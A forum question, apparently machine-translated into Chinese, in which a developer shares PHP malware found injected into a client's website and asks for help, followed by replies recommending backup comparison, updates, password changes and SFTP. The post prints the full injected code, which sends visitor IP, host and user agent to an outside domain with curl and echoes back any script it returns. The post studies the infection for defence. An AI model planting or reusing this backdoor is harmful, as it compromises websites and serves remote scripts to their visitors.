1
我們接到客戶的電話,他們的網站被破壞,只部分加載。當尋找通過網站上的代碼,我發現這個片斷:在客戶的網站上發現惡意代碼
<?php
#9da223#
error_reporting(0);
ini_set('display_errors',0);
$wp_nht097 = @$_SERVER['HTTP_USER_AGENT'];
if ((preg_match ('/Gecko|MSIE/i', $wp_nht097)
&& !preg_match ('/bot/i', $wp_nht097))) {
$wp_nht09097 =
"http://" . "error" . "class" . ".com/class" . "/?ip=".$_SERVER['REMOTE_ADDR']
."& referer=" . urlencode($_SERVER['HTTP_HOST'])
."&ua=" . urlencode($wp_nht097);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL,$wp_nht09097);
curl_setopt($ch, CURLOPT_TIMEOUT, 6);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$wp_097nht = curl_exec ($ch);
curl_close($ch);
}
if (substr($wp_097nht,1,3) === 'scr'){
echo $wp_097nht;
}
#/9da223#
?>
該網站上的「捲曲_」一個停止工作,因爲未定義功能 - 功能在上面的代碼。
從我可以收集它嘗試從errorclass.com獲取內容,傳遞域,用戶IP和用戶代理,並作爲響應尋找腳本標記,如果它找到一個,它將打印對文件的迴應。
我試圖查看正在請求的內容,但目前該網站只顯示返回完全空白的文檔。
該域名追溯到中國,並且與該域名相關的IP地址轉移到荷蘭。
以前有人看過類似的東西嗎?
客戶端託管在同一臺服務器上的各種其他網站,謝天謝地,他們都沒有受到任何損害。
編輯:
我挖得更深一些網站主辦,它出現其中幾個被泄露。原來的網站不是一個WordPress的網站,但另一個是。似乎某種形式的機器人在編輯過程中進行了編輯,因爲它們都是在上週二(1月21日)上午12點55分同時編輯的。
我們製作的所有網站在安裝到客戶端選擇的服務器後,我們都會給予客戶完全控制權。因此,爲什麼需要一些時間讓我們意識到這個問題。
將整個站點與上次備份或回購快照進行比較。如果有內容數據庫,請恢復最後一個已知的安全版本。使用安全掃描程序或信譽良好的安全公司在您的站點上運行SQL注入和XSS測試。 – halfer
你的wordpress實例是最新的嗎?您始終必須跟上安全修復程序的更新。 – epascarello
並更改密碼,請確保您使用sftp而不是ftp。 – jeroen